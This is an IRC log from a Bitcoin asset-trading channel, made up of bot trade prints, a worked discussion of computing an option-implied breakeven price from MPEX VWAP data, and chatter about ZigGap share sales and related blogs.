Feb 24 15:50:00 then pay someone to make an estimate otherwise you can't discount them as competition Feb 24 15:50:21 thestringpuller that's neither here nor there. Feb 24 15:50:27 with that logic only yourself and smickles are elgible to run the study :P Feb 24 15:50:31 you wish to propose something exists, you'll have to do a lot better than that. Feb 24 15:50:41 thestringpuller dooglus can, if he feels like it. Feb 24 15:50:58 for that matter the owner himself can come out and make monthly statements like everyone else. Feb 24 15:51:02 not such a big deal. Feb 24 15:53:45 thestringpuller but you do bring an interesting point. in spite of 1mn words being written a week into this channel, there's an incredible dearth of people doing useful stuff, such as, keeping a blog with good quality research. Feb 24 15:53:56 consequently, the headcount of "known and respected" is dismal. Feb 24 15:54:35 I'm the one who make tools around here =/ Feb 24 15:54:35 [MPEX] [S.MPOE] 595 @ 0.00062798 = 0.3736 BTC [+] Feb 24 15:54:36 [MPEX] [S.MPOE] 2500 @ 0.00062797 = 1.5699 BTC [-] Feb 24 15:54:36 That's not for you to decide, one scientist performs and experiment publishes results. Another verifies. Feb 24 15:54:38 [MPEX] [S.MPOE] 5000 @ 0.00062444 = 3.1222 BTC [-] Feb 24 15:54:39 [MPEX] [S.MPOE] 10210 @ 0.00062443 = 6.3754 BTC [-] Feb 24 15:54:41 [MPEX] [S.MPOE] 11147 @ 0.00062432 = 6.9593 BTC [-] Feb 24 15:54:50 If enough people verify then it's valid. Feb 24 15:54:50 Seen my update to my options calculator tool, mircea? Feb 24 15:56:54 [MPEX] [S.MPOE] 11653 @ 0.00062432 = 7.2752 BTC [-] Feb 24 15:56:56 [MPEX] [S.MPOE] 3611 @ 0.00062389 = 2.2529 BTC [-] Feb 24 15:58:07 thestringpuller that's not how reality works i'm affraid. Feb 24 15:58:11 Namworld i think not Feb 24 15:58:21 so who determines reality? Feb 24 15:58:27 you? Feb 24 15:58:36 agreement doth not reality make. Feb 24 15:58:54 and absent actual experiments (which did NOT occur) the agreement is by definition agreement of idiots. Feb 24 15:59:52 could you rephrase the above stament? Feb 24 16:00:20 why/into what/why/etc Feb 24 16:00:29 https://docs.google.com/spreadsheet/ccc?key=0AvwwyRGyc1WgdGxfRk5SS0hxT1lsVmdLdU1QY0RveGc#gid=0 Feb 24 16:00:55 You can change the price you expect the average to reach and see ROI at execution. Feb 24 16:01:04 Namworld o interesting! Feb 24 16:01:15 hey listen, why don't you make a single value ? Feb 24 16:01:15 So you can select options with the most return per BTC, based on current asks Feb 24 16:01:18 something like this : Feb 24 16:01:24 Does this use black-scholes? Feb 24 16:01:30 go into the vwap json, calculate the implicit breakeven of each option line Feb 24 16:01:39 then average this weighted by the volume of that line Feb 24 16:01:42 and publish the final result. Feb 24 16:02:19 ^- that would be very useful Feb 24 16:02:31 then average this weighted by the volume of that line << what do you mean by that? Feb 24 16:02:36 i imagine you would get a bunch of people going there daily just to check that Feb 24 16:02:41 Namworld i give you an example. Feb 24 16:03:18 "O.BTCUSD.C310T": {"1d": {"avg": "","min": "","max": "","vsh": "","vsa": "","cnt": ""}, "7d": {"avg": "28103279","min": "28103279","max": "28103279","vsh": "10","vsa": "281032790","cnt": "1"}, "30d": {"avg": "28103279","min": "28103279","max": "28103279","vsh": "10","vsa": "281032790","cnt": "1"}} Feb 24 16:03:41 "O.BTCUSD.C220T": {"1d": {"avg": "","min": "","max": "","vsh": "","vsa": "","cnt": ""}, "7d": {"avg": "20577298","min": "20577298","max": "20577298","vsh": "3","vsa": "61731894","cnt": "1"}, "30d": {"avg": "19660880","min": "18744462","max": "20577298","vsh": "6","vsa": "117965280","cnt": "2"}} Feb 24 16:03:55 now, working on the 7d averages Feb 24 16:04:08 in the case of 310 breakeven is x, in the case of 220 breakeven is y Feb 24 16:04:44 final value = (x * 281032790 + y * 61731894) / (281032790 +61731894) Feb 24 16:04:46 [MPEX] [S.DICE] 1291 @ 0.00603899 = 7.7963 BTC [+] Feb 24 16:04:47 [MPEX] [S.DICE] 10 @ 0.00603899 = 0.0604 BTC [+] Feb 24 16:05:12 mircea_popescu: is there away to get the STATJSON without mpex account? Feb 24 16:05:23 [MPEX] [S.DICE] 1196 @ 0.00590307 = 7.0601 BTC [-] Feb 24 16:05:30 thestringpuller no, inasmuch as it's the statjson of that account. Feb 24 16:06:14 how do we get ticker json of mpex? Feb 24 16:06:17 final value = (x * 281032790 + y * 61731894) / (281032790 +61731894) Feb 24 16:06:25 what is that supposed to represent? Feb 24 16:06:36 thestringpuller that's in the faq dood. http://mpex.co/faq.html#11 Feb 24 16:06:50 you update the faq so much Feb 24 16:06:51 Namworld a sort of "btc value implied by option contracts" Feb 24 16:06:59 I don't know when to recheck it :P Feb 24 16:07:08 allthetime:D Feb 24 16:07:14 this has been there for > 6 months Feb 24 16:07:25 But that requires to mix the result for two set of options... Feb 24 16:07:28 yes. Feb 24 16:07:36 well, don't mix t and n Feb 24 16:07:38 but mix p and c Feb 24 16:08:04 I don't think I can do that Feb 24 16:08:07 makes it better to price options... Feb 24 16:08:09 why not ?! Feb 24 16:08:28 I'd need to let someone select the two to mix Feb 24 16:08:40 no Namworld you mix all. Feb 24 16:08:50 you just take the entire vwap list and calc the average for everything there. Feb 24 16:08:51 ALL? Feb 24 16:08:53 yup Feb 24 16:09:01 hmm Feb 24 16:09:03 pick something, like t 7d and that's it. Feb 24 16:09:06 out comes a number. Feb 24 16:09:19 which whiole not precise, will be a MUCH better guess than any other guess someone makes. Feb 24 16:09:31 you can also publish the result of the (281032790 +61731894) sum Feb 24 16:09:37 guess for what? Feb 24 16:09:37 so people know how much btc that guess has behind it Feb 24 16:09:48 thestringpuller for next week's btc price i think Feb 24 16:10:06 oh I see Feb 24 16:11:23 mircea_popescu what would be a better way to calculate options? Feb 24 16:11:46 i think if the calculator had current asks at all times it would be interesting Feb 24 16:13:36 catching up on chat log, here is the github for what dooglus uses (or at least based his work on) to do SDICE reports https://github.com/etotheipi/BitcoinArmory/tree/master/extras Feb 24 16:13:49 would love to see someone implement that on a dynamic web page Feb 24 16:14:05 or even generate reports on a more freq sched than doog Feb 24 16:14:27 ;;ticker Feb 24 16:14:27 BTCUSD ticker | Best bid: 29.56003, Best ask: 29.66000, Bid-ask spread: 0.09997, Last trade: 29.66000, 24 hour volume: 37518.33733560, 24 hour low: 28.00000, 24 hour high: 29.97000, 24 hour vwap: 28.92295 Feb 24 16:15:53 [BTCTC] [SYNERGY] 1 @ 0.11979 BTC [+] Feb 24 16:16:31 [BTCTC] [SYNERGY] 1 @ 0.1198 BTC [+] Feb 24 16:16:57 http://shrani.si/f/d/A8/2WDF9SMB/sierra-mpex.png Feb 24 16:22:14 a thanks ThickAsThieves Feb 24 16:22:28 i was etotheipi! Feb 24 16:22:32 jesys hard name to remember Feb 24 16:22:59 np Feb 24 16:23:08 kakobrekla cool stuff! Feb 24 16:23:20 ;;later tell bugpowder http://shrani.si/f/d/A8/2WDF9SMB/sierra-mpex.png Feb 24 16:23:21 The operation succeeded. Feb 24 16:24:39 what is a kakobrekla? that word gets like stuck in my head Feb 24 16:26:12 kakobrekla is "that's what she said" in turkmenistani Feb 24 16:26:24 :DDDD Feb 24 16:27:02 [MPEX] [S.MPOE] 10347 @ 0.00062996 = 6.5182 BTC [+] Feb 24 16:27:04 [MPEX] [S.MPOE] 9189 @ 0.00062533 = 5.7462 BTC [-] Feb 24 16:27:06 [MPEX] [S.MPOE] 5370 @ 0.0006239 = 3.3503 BTC [-] Feb 24 16:27:09 [MPEX] [S.MPOE] 139 @ 0.00062389 = 0.0867 BTC [-] Feb 24 16:27:10 ;;google slinky on an escalator Feb 24 16:27:10 Slinky + Escalator = WIN - YouTube: ; GEICO Slinky Commercial - Happier Than A Slinky On An Escalator ...: ; Slinky vs Escalator - YouTube: Feb 24 16:27:11 [MPEX] [S.MPOE] 3655 @ 0.00062379 = 2.28 BTC [-] Feb 24 16:27:21 not to be confused with kako braka Feb 24 16:27:24 which is different somehow Feb 24 16:27:49 i had to look up if turkmenistani was a real thing Feb 24 16:27:57 How to calculate breakeven... what formula... Feb 24 16:28:58 arf, after a sleepless night I got a hard time to think Feb 24 16:29:34 I have Ask = A, Struck = S, Weighted = W, trying to find what weighted gives the ask. Feb 24 16:29:40 ya, you look at what you paid, what you got and how much is worth Feb 24 16:29:57 So I have a formula as (W - S)/ W = A Feb 24 16:30:12 Now I need to rewrite that as a function of W... Feb 24 16:30:40 To have a formula based on ask to calculate weighted needed to breakeven... Feb 24 16:33:41 Namworld forget weighted. Feb 24 16:34:11 if call is struck at 31 and price paid was 0.15 Feb 24 16:34:24 then you have (x - 31 / x) = .15 Feb 24 16:34:30 get the x, the WEIGH THAT Feb 24 16:34:54 i mean (x - 31) / x = .15 obviously Feb 24 16:39:37 You still can't find X... Feb 24 16:41:15 ... Feb 24 16:41:24 1 - 31/x = .15 Feb 24 16:41:29 .85 = 31/x Feb 24 16:41:38 x = 31/.85 Feb 24 16:42:22 [MPEX] [S.MPOE] 5370 @ 0.0006318 = 3.3928 BTC [+] Feb 24 16:42:23 [MPEX] [S.MPOE] 595 @ 0.00063181 = 0.3759 BTC [+] Feb 24 16:42:25 [MPEX] [S.MPOE] 5000 @ 0.00063182 = 3.1591 BTC [+] Feb 24 16:42:26 [MPEX] [S.MPOE] 4321 @ 0.00063183 = 2.7301 BTC [+] Feb 24 16:42:28 [MPEX] [S.MPOE] 1114 @ 0.00063187 = 0.7039 BTC [+] Feb 24 16:46:14 ;;calc 31/.85 Feb 24 16:46:14 36.4705882353 Feb 24 16:46:36 mircea_popescu: that's the formula smickles uses... Feb 24 16:47:03 http://trilema.com/2013/the-free-cash-machine/ Feb 24 16:49:37 that article makes me mad Feb 24 16:49:57 arf, god am I sleepy. Of course >.> Feb 24 16:50:26 grrr down with popescu grrrr Feb 24 16:50:51 thestringpuller eh ? Feb 24 16:51:57 weren't you the one to tell me btc isn't for consumers? Feb 24 16:52:47 it isn't. Feb 24 16:54:02 so why give "free money away" to consumers :P Feb 24 16:54:12 it's not to consumers. Feb 24 16:54:19 the average atm withdrawal is like 50 bux Feb 24 16:54:26 i bet you the average here would be north of 500 Feb 24 16:54:37 so why would anyone want fiat over btc? Feb 24 16:54:51 keep all your wealth in btc, pay bills or w/e in cash Feb 24 16:55:07 i do that Feb 24 16:55:24 you can do that without a cash machine that will costs billions to implement..... Feb 24 16:55:47 thestringpuller you don't get 2 bn worth of in your face plebs neener without spending 2bn to implement it. Feb 24 16:56:16 come again? Feb 24 16:57:00 thestringpuller (you don't get) (2 bn worth of ((in your face plebs) neener)) (without spending 2bn (to implement it)). Feb 24 16:57:08 lol Feb 24 16:57:10 :D Feb 24 16:57:44 :P Feb 24 16:59:56 kakobrekla dude that sierra chart... Feb 24 17:00:00 it looks like a stock! Feb 24 17:00:04 [MPEX] [S.DICE] 6222 @ 0.006 = 37.332 BTC [+] Feb 24 17:00:06 [MPEX] [S.DICE] 2000 @ 0.00606656 = 12.1331 BTC [+] Feb 24 17:00:08 [MPEX] [S.DICE] 1700 @ 0.00606657 = 10.3132 BTC [+] Feb 24 17:00:09 cause it is? :) Feb 24 17:00:11 [MPEX] [S.DICE] 78 @ 0.00637978 = 0.4976 BTC [+] Feb 24 17:00:51 for srsly! Feb 24 17:00:57 kakobrekla: where'd you get all the data from since mr. popescu permaseals mpex trades Feb 24 17:01:18 i steal from assbot. Feb 24 17:01:27 *le sigh* Feb 24 17:01:30 what Feb 24 17:01:43 [HAVELOCK] [SDICE] 4 @ 0.675 = 2.7 BTC [-] Feb 24 17:01:45 [HAVELOCK] [SDICE] 15 @ 0.672 = 10.08 BTC [-] Feb 24 17:01:45 [HAVELOCK] [SDICE] 3 @ 0.671 = 2.013 BTC [-] Feb 24 17:01:46 [HAVELOCK] [SDICE] 1 @ 0.664 BTC [-] Feb 24 17:01:48 [HAVELOCK] [SDICE] 15 @ 0.664 = 9.96 BTC [-] Feb 24 17:01:49 [HAVELOCK] [SDICE] 15 @ 0.656 = 9.84 BTC [-] Feb 24 17:01:50 [HAVELOCK] [SDICE] 15 @ 0.648 = 9.72 BTC [-] Feb 24 17:01:51 [HAVELOCK] [SDICE] 15 @ 0.64 = 9.6 BTC [-] Feb 24 17:01:52 [HAVELOCK] [SDICE] 17 @ 0.64 = 10.88 BTC [-] Feb 24 17:05:24 [BTCTC] [B.YABMC] 100 @ 0.00527 = 0.527 BTC [-] Feb 24 17:06:43 [BTCTC] [B.YABMC] 100 @ 0.00527 = 0.527 BTC [-] Feb 24 17:06:45 [BTCTC] [B.YABMC] 43 @ 0.00526 = 0.2262 BTC [-] Feb 24 17:06:47 [BTCTC] [B.YABMC] 100 @ 0.00521 = 0.521 BTC [-] Feb 24 17:06:49 [BTCTC] [B.YABMC] 18 @ 0.00516 = 0.0929 BTC [-] Feb 24 17:07:51 [MPEX] [S.DICE] 1550 @ 0.00624859 = 9.6853 BTC [-] Feb 24 17:09:29 ok last one Feb 24 17:09:31 http://shrani.si/f/23/qk/30Si8ztN/mpex.png Feb 24 17:09:41 this ones for the front page trilema :p Feb 24 17:10:17 i like how it says forex data lol Feb 24 17:10:27 what other ventures do you run besides bit4x Feb 24 17:10:35 bitbet Feb 24 17:10:35 [MPEX] [S.MPOE] 4321 @ 0.00062416 = 2.697 BTC [-] Feb 24 17:10:36 [MPEX] [S.MPOE] 6012 @ 0.00062397 = 3.7513 BTC [-] Feb 24 17:10:39 besides that Feb 24 17:10:43 [MPEX] [S.MPOE] 5269 @ 0.00062396 = 3.2876 BTC [-] Feb 24 17:10:45 ur mom Feb 24 17:10:45 [MPEX] [S.MPOE] 6545 @ 0.00062379 = 4.0827 BTC [-] Feb 24 17:10:46 [MPEX] [S.MPOE] 2200 @ 0.00062374 = 1.3722 BTC [-] Feb 24 17:10:47 [MPEX] [S.MPOE] 8698 @ 0.00062107 = 5.4021 BTC [-] Feb 24 17:10:49 [MPEX] [S.MPOE] 1855 @ 0.00062083 = 1.1516 BTC [-] Feb 24 17:10:56 UR MOM Feb 24 17:11:04 how did dividends already come out for mpoe? Feb 24 17:11:06 kakobrekla! (that's what she said) Feb 24 17:11:09 friday Feb 24 17:11:19 no ur mom. Feb 24 17:12:21 don't they come out at the end of the month? Feb 24 17:13:22 it is the end of the month Feb 24 17:13:24 last friday of the month Feb 24 17:13:49 ;;seen smickles Feb 24 17:13:49 smickles was last seen in #bitcoin-assets 2 weeks, 1 day, 13 hours, 3 minutes, and 9 seconds ago: pong Feb 24 17:14:48 ah ok Feb 24 17:18:09 makomk malaimo markedathome maximian midnightmagic mircea_popescu mjr_ mjr__ mod6_ molecular Feb 24 17:18:18 mjr_ end of options month. last friday Feb 24 17:20:10 ah ok Feb 24 17:20:19 cool Feb 24 17:21:04 statements come out end of month though right? or up to 5 days into the next month? Feb 24 17:29:39 no that friday Feb 24 17:29:45 mircea is good about financials Feb 24 17:29:54 mjr_ they're out already Feb 24 17:29:59 [MPEX] [S.MPOE] 1689 @ 0.00063168 = 1.0669 BTC [+] Feb 24 17:30:59 mircea_popescu I have some research for you. Feb 24 17:31:05 that you may find interesting :P Feb 24 17:31:09 ALBEIT NOT CREDIBLE Feb 24 17:34:21 [MPEX] [S.MPOE] 5000 @ 0.00063048 = 3.1524 BTC [-] Feb 24 17:39:46 mircea_popescu: how many active users does mpex have? just curious Feb 24 17:39:55 pm if you want. wont repeat it :) Feb 24 17:40:10 http://trilema.com/mpex-paid-accounts Feb 24 17:41:51 aha Feb 24 17:42:00 time to recheck the blockchain chart Feb 24 17:42:03 http://blockchain.info/charts/my-wallet-n-users Feb 24 17:42:06 still going. Feb 24 17:42:40 Nice Mircea Feb 24 17:47:50 lul @ the only bitcoin service that has never been hacked. Feb 24 17:47:57 sounds like a invitation? Feb 24 17:48:34 social hack it Feb 24 17:48:48 using the facebooks and twitter Feb 24 17:51:30 ;;ticker Feb 24 17:51:31 BTCUSD ticker | Best bid: 29.80001, Best ask: 29.85011, Bid-ask spread: 0.05010, Last trade: 29.80001, 24 hour volume: 29443.58889373, 24 hour low: 28.02009, 24 hour high: 29.97000, 24 hour vwap: 29.27130 Feb 24 17:56:42 [MPEX] [S.DICE] 2100 @ 0.0061 = 12.81 BTC [-] Feb 24 17:57:18 kakobrekla does bitbet have an API yet? Feb 24 17:58:39 not really Feb 24 17:59:05 it's going to be useful in the future due to the way Feb 24 17:59:11 it creates the betting line Feb 24 17:59:40 hm? Feb 24 18:00:02 BitHub yah. also, http://www.reddit.com/r/Bitcoin/comments/ycgm8/freeforall_pentesting_on_mpex/ Feb 24 18:00:19 thestringpuller what would an api do you can't do as it is tho ? Feb 24 18:00:37 ill give you 1300 btc if you hack mt4 Feb 24 18:00:38 :p Feb 24 18:00:59 mircea_popescu: you know that ad agencies use reddit to help predict virality no? Feb 24 18:01:22 i don't think "ad agencies" have a clue about anything. Feb 24 18:01:29 nice mircea buy why reward so cheeeap? Feb 24 18:01:33 but& Feb 24 18:01:54 bitbet is far more useful, it creates an effective betting line Feb 24 18:01:57 hey, knuth pays 2 dollars. Feb 24 18:02:18 i saw the best betting site the other day Feb 24 18:02:23 they actually did it right Feb 24 18:02:29 proper odds Feb 24 18:02:29 and also http://trilema.com/2013/wikipedia-the-special-olympics-for-the-mentally-retarded/ Feb 24 18:03:09 http://blockbet.net/ Feb 24 18:04:15 things that are paid for grow and develop, things that aren't wither and go away << how about linux? Feb 24 18:05:45 it is paid for. Feb 24 18:07:22 Is it? Feb 24 18:07:34 ;) Feb 24 18:08:35 ;;bc,stats Feb 24 18:08:42 Current Blocks: 222887 | Current Difficulty: 3651011.630693214 | Next Difficulty At Block: 223775 | Next Difficulty In: 888 blocks | Next Difficulty In About: 5 days, 0 hours, 24 minutes, and 24 seconds | Next Difficulty Estimate: 4309344.79843 | Estimated Percent Change: 18.03153 Feb 24 18:11:45 ;;ticker Feb 24 18:11:45 BTCUSD ticker | Best bid: 29.92378, Best ask: 29.94998, Bid-ask spread: 0.02620, Last trade: 29.94999, 24 hour volume: 29511.56644135, 24 hour low: 28.02009, 24 hour high: 29.97000, 24 hour vwap: 29.32205 Feb 24 18:17:10 [MPEX] [S.MPOE] 5000 @ 0.00063167 = 3.1584 BTC [+] Feb 24 18:17:11 [MPEX] [S.MPOE] 4323 @ 0.00063168 = 2.7308 BTC [+] Feb 24 18:17:13 [MPEX] [S.MPOE] 990 @ 0.00063169 = 0.6254 BTC [+] Feb 24 18:19:15 ;;calc .011 * 30 Feb 24 18:19:16 0.33 Feb 24 18:20:52 hey mircea... that's exactly what I was talking about for sports bet Feb 24 18:21:24 anyway, I'm off Feb 24 18:21:35 [MPEX] [S.MPOE] 9681 @ 0.00063048 = 6.1037 BTC [-] Feb 24 18:23:18 blockbet is awesome Feb 24 18:26:51 :) Feb 24 18:29:00 [MPEX] [S.MPOE] 3331 @ 0.00063169 = 2.1042 BTC [+] Feb 24 18:29:00 [MPEX] [S.MPOE] 4469 @ 0.00063187 = 2.8238 BTC [+] Feb 24 18:33:27 [MPEX] [S.MPOE] 4219 @ 0.00063048 = 2.66 BTC [-] Feb 24 18:33:29 [MPEX] [S.MPOE] 4321 @ 0.00062634 = 2.7064 BTC [-] Feb 24 18:33:33 [MPEX] [S.MPOE] 5033 @ 0.00062633 = 3.1523 BTC [-] Feb 24 18:33:35 [MPEX] [S.MPOE] 5700 @ 0.00062632 = 3.57 BTC [-] Feb 24 18:34:28 [MPEX] [S.MPOE] 4677 @ 0.00062239 = 2.9109 BTC [-] Feb 24 18:34:30 [MPEX] [S.MPOE] 4088 @ 0.00063187 = 2.5831 BTC [+] Feb 24 18:34:32 [MPEX] [S.MPOE] 4321 @ 0.00063408 = 2.7399 BTC [+] Feb 24 18:34:33 [MPEX] [S.MPOE] 5414 @ 0.00063409 = 3.433 BTC [+] Feb 24 18:37:16 [MPEX] [S.MPOE] 4321 @ 0.00063379 = 2.7386 BTC [-] Feb 24 18:37:17 [MPEX] [S.MPOE] 4321 @ 0.00063392 = 2.7392 BTC [+] Feb 24 18:37:18 [MPEX] [S.MPOE] 11404 @ 0.00063409 = 7.2312 BTC [+] Feb 24 18:38:57 [MPEX] [S.MPOE] 2054 @ 0.0006354 = 1.3051 BTC [+] Feb 24 18:38:58 [MPEX] [S.MPOE] 4321 @ 0.00062669 = 2.7079 BTC [-] Feb 24 18:39:01 [MPEX] [S.MPOE] 10256 @ 0.00062642 = 6.4246 BTC [-] Feb 24 18:46:30 [MPEX] [S.MPOE] 3040 @ 0.00063555 = 1.9321 BTC [+] Feb 24 18:48:11 [BTCTC] [GSDPT] 20 @ 0.0059 = 0.118 BTC [-] Feb 24 18:49:56 [MPEX] [S.MPOE] 10000 @ 0.00063583 = 6.3583 BTC [+] Feb 24 18:49:58 [MPEX] [S.MPOE] 16000 @ 0.00063584 = 10.1734 BTC [+] Feb 24 18:50:00 [MPEX] [S.MPOE] 660 @ 0.00063584 = 0.4197 BTC [+] Feb 24 18:50:02 [MPEX] [S.MPOE] 1887 @ 0.00063585 = 1.1998 BTC [+] Feb 24 18:50:03 [MPEX] [S.MPOE] 4753 @ 0.00063702 = 3.0278 BTC [+] Feb 24 19:02:10 [MPEX] [S.MPOE] 5810 @ 0.00063555 = 3.6925 BTC [-] Feb 24 19:02:12 [MPEX] [S.MPOE] 2990 @ 0.00062671 = 1.8739 BTC [-] Feb 24 19:12:14 [MPEX] [S.DICE] 6350 @ 0.0061 = 38.735 BTC [-] Feb 24 19:12:20 [MPEX] [S.DICE] 122 @ 0.00637978 = 0.7783 BTC [+] Feb 24 19:12:22 [MPEX] [S.DICE] 2000 @ 0.00637979 = 12.7596 BTC [+] Feb 24 19:12:28 [MPEX] [S.DICE] 200 @ 0.00637979 = 1.276 BTC [+] Feb 24 19:12:32 [MPEX] [S.DICE] 1000 @ 0.0063798 = 6.3798 BTC [+] Feb 24 19:12:33 [MPEX] [S.DICE] 328 @ 0.00637989 = 2.0926 BTC [+] Feb 24 19:12:43 [HAVELOCK] [SDICE] 25 @ 0.65 = 16.25 BTC [+] Feb 24 19:12:44 [HAVELOCK] [SDICE] 6 @ 0.6400001 = 3.84 BTC [-] Feb 24 19:12:46 [HAVELOCK] [SDICE] 28 @ 0.64 = 17.92 BTC [-] Feb 24 19:12:46 [HAVELOCK] [SDICE] 15 @ 0.632 = 9.48 BTC [-] Feb 24 19:12:47 [HAVELOCK] [SDICE] 1 @ 0.63 BTC [-] Feb 24 19:12:48 [HAVELOCK] [SDICE] 25 @ 0.6241 = 15.6025 BTC [-] Feb 24 19:12:54 [MPEX] [S.MPOE] 1331 @ 0.00062708 = 0.8346 BTC [+] Feb 24 19:12:56 [MPEX] [S.MPOE] 4424 @ 0.00062692 = 2.7735 BTC [-] Feb 24 19:17:03 !ticker h sdice Feb 24 19:17:05 [HAVELOCK:SDICE] 1D: 0.60000000 / 0.6540726 / 0.68100000 (270 shares, 176.59960070 BTC), 7D: 0.60000000 / 0.67973747 / 0.75100000 (1447 shares, 983.58011202 BTC), 30D: 0.52100000 / 0.66742537 / 0.89000000 (11108 shares, 7413.76098446 BTC) Feb 24 19:19:47 https://bitcointalk.org/index.php?topic=146611.0 Feb 24 19:21:02 [MPEX] [S.MPOE] 3980 @ 0.00062725 = 2.4965 BTC [+] Feb 24 19:21:03 [MPEX] [S.MPOE] 4321 @ 0.00062724 = 2.7103 BTC [-] Feb 24 19:21:05 [MPEX] [S.MPOE] 11576 @ 0.00062692 = 7.2572 BTC [-] Feb 24 19:21:07 [MPEX] [S.MPOE] 3000 @ 0.00062691 = 1.8807 BTC [-] Feb 24 19:21:08 [MPEX] [S.MPOE] 10125 @ 0.0006267 = 6.3453 BTC [-] Feb 24 19:21:10 [MPEX] [S.MPOE] 6144 @ 0.00062642 = 3.8487 BTC [-] Feb 24 19:21:11 [MPEX] [S.MPOE] 5066 @ 0.00062096 = 3.1458 BTC [-] Feb 24 19:21:12 [MPEX] [S.MPOE] 5038 @ 0.00062083 = 3.1277 BTC [-] Feb 24 19:23:25 [MPEX] [S.MPOE] 3980 @ 0.00063637 = 2.5328 BTC [+] Feb 24 19:23:27 [MPEX] [S.MPOE] 4321 @ 0.00063638 = 2.7498 BTC [+] Feb 24 19:23:29 [MPEX] [S.MPOE] 6749 @ 0.00063656 = 4.2961 BTC [+] Feb 24 19:26:50 [MPEX] [S.MPOE] 4700 @ 0.00062321 = 2.9291 BTC [-] Feb 24 19:36:28 [MPEX] [S.MPOE] 3972 @ 0.00062322 = 2.4754 BTC [+] Feb 24 19:36:29 [MPEX] [S.MPOE] 6028 @ 0.00062321 = 3.7567 BTC [-] Feb 24 19:37:05 [MPEX] [S.MPOE] 14283 @ 0.00062322 = 8.9015 BTC [+] Feb 24 19:38:21 https://bitfunder.com/asset/ZigGap Feb 24 19:54:46 [BTCTC] [BTC-BOND] 1 @ 0.0099 BTC [-] Feb 24 19:55:36 [BTCTC] [BTC-BOND] 9 @ 0.00988 = 0.0889 BTC [-] Feb 24 19:55:38 [BTCTC] [BTC-BOND] 2 @ 0.00984 = 0.0197 BTC [-] Feb 24 19:55:40 [BTCTC] [BTC-BOND] 8 @ 0.00982 = 0.0786 BTC [-] Feb 24 19:56:52 [BTCTC] [GSDPT] 33 @ 0.006 = 0.198 BTC [+] Feb 24 20:08:02 [MPEX] [S.MPOE] 4321 @ 0.00062097 = 2.6832 BTC [-] Feb 24 20:08:03 [MPEX] [S.MPOE] 8272 @ 0.00062085 = 5.1357 BTC [-] Feb 24 20:08:05 [MPEX] [S.MPOE] 10728 @ 0.00062084 = 6.6604 BTC [-] Feb 24 20:08:06 [MPEX] [S.MPOE] 3107 @ 0.00062083 = 1.9289 BTC [-] Feb 24 20:08:06 [MPEX] [S.MPOE] 2772 @ 0.00062072 = 1.7206 BTC [-] Feb 24 20:11:46 Ukto, congrats! Feb 24 20:12:23 and aethero, too Feb 24 20:12:49 Thanks! Feb 24 20:14:32 um, you forgot to specify whether they shares have voting power Feb 24 20:14:53 ZigGap shares offer no voting rights. ic Feb 24 20:14:55 I did specify Feb 24 20:15:55 hm... and you keep your books in USD and just convert to BTC before div payment? Feb 24 20:16:58 that may make quite a difference... $907.52 may be only 20BTC if btcusd goes to 45, for example Feb 24 20:18:26 as compared to 31BTC if converted now Feb 24 20:18:39 ;;ticker Feb 24 20:18:40 BTCUSD ticker | Best bid: 30.30141, Best ask: 30.30326, Bid-ask spread: 0.00185, Last trade: 30.30141, 24 hour volume: 25292.94444931, 24 hour low: 28.76500, 24 hour high: 30.39877, 24 hour vwap: 29.65508 Feb 24 20:19:20 oh weekend dip over Feb 24 20:20:07 aethero ^^^ Feb 24 20:22:37 We keep our books in USD and convert to BTC when payments are due. Feb 24 20:23:01 It makes things easier for us legally speaking Feb 24 20:23:36 hm, might be more attractive if you converted every day's earnings into BTC and collected that in the end of the month Feb 24 20:23:43 and paid out Feb 24 20:24:01 just my bullish self speaking :D Feb 24 20:24:26 I'm a bit bearish actually Feb 24 20:24:45 Not too bad though Feb 24 20:25:44 That's something to consider Feb 24 20:30:34 grabbed some shares, looks like you'll have your first million shares sold very soon Feb 24 20:30:56 There is someone depositing BTC right now to get the other 9. So they say./ Feb 24 20:32:13 So you might want to buy now before his confirm :) Feb 24 20:32:24 i'd buy some, too...if you haven't come on the exact day i have to gather all outstanding cash to buy mpoe bond :( Feb 24 20:32:56 but if someone wants to buy now without waiting for confirmation and repay me hour or two later...? Feb 24 20:33:15 pm me ;) Feb 24 20:37:10 first mil almost gone Feb 24 20:41:28 [MPEX] [S.MPOE] 2722 @ 0.00062073 = 1.6896 BTC [+] Feb 24 20:41:41 [MPEX] [S.MPOE] 4388 @ 0.00062072 = 2.7237 BTC [-] Feb 24 20:41:43 [MPEX] [S.MPOE] 32 @ 0.00062012 = 0.0198 BTC [-] Feb 24 20:41:44 [MPEX] [S.MPOE] 32 @ 0.00062012 = 0.0198 BTC [-] Feb 24 20:41:48 [MPEX] [S.MPOE] 32 @ 0.00062012 = 0.0198 BTC [-] Feb 24 20:41:50 [MPEX] [S.MPOE] 32 @ 0.00062012 = 0.0198 BTC [-] Feb 24 20:41:54 [MPEX] [S.MPOE] 8810 @ 0.00062007 = 5.4628 BTC [-] Feb 24 20:42:01 1mil sold Feb 24 20:42:21 Ukto, asssssbot! Feb 24 20:42:35 its so.. asssy Feb 24 20:42:36 :P Feb 24 20:48:01 [MPEX] [S.MPOE] 9150 @ 0.00062007 = 5.6736 BTC [-] Feb 24 20:48:53 [MPEX] [S.MPOE] 15000 @ 0.00062007 = 9.3011 BTC [-] Feb 24 20:49:51 another 100k sold :P Feb 24 20:51:23 Jeeze Feb 24 20:51:28 I wonder if S.DICE sold this quickly Feb 24 20:51:38 btc amount or share vol? Feb 24 20:51:42 BTC Feb 24 20:51:52 hm Feb 24 20:56:53 another 200k sold Feb 24 20:58:24 Get 'em while they're hot Feb 24 20:58:45 Price is doubling after this first 10 mil. Feb 24 21:03:43 All sold Feb 24 21:04:04 and there it was Feb 24 21:04:06 8.7mil just sold Feb 24 21:04:11 [MPEX] [S.MPOE] 340 @ 0.00062007 = 0.2108 BTC [-] Feb 24 21:04:13 [MPEX] [S.MPOE] 12860 @ 0.00062002 = 7.9735 BTC [-] Feb 24 21:05:16 nice Feb 24 21:05:42 now that person will try and unload them on the next tranche Feb 24 21:05:43 https://bitfunder.com/market <-- 500btc out today to ZigGap :) Congrats Aethero on your first 10mil Feb 24 21:05:52 Probably not Feb 24 21:06:00 if ppl are smart, these are the shares to hold Feb 24 21:06:04 Thanks! Feb 24 21:06:23 I bought a few for myself for future prosperity/divs Feb 24 21:08:35 [MPEX] [S.MPOE] 28390 @ 0.00062002 = 17.6024 BTC [-] Feb 24 21:08:37 [MPEX] [S.MPOE] 2510 @ 0.00062 = 1.5562 BTC [-] Feb 24 21:12:31 asicminer at 4.6 GH/s Feb 24 21:12:47 increasing a little slowly if they wanna have 12 